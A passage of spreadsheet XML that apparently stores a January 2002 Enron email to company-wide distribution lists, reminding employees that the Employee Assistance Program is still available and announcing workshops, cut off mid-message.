_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 14:13:38 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dl-ga-all_domestic@enron.com', 'dl-ga-all_netco@enron.com'})</t>
  </si>
  <si>
    <t>Employee Assistance Program - Workshops Scheduled</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
Enron employees may find the current circumstances stressful.  We want to remind you that Enron's Employee Assistance Program (EAP) is still available and currently offering services to assist you and your family._x000D_
_x000D_
Group Discussions                                                        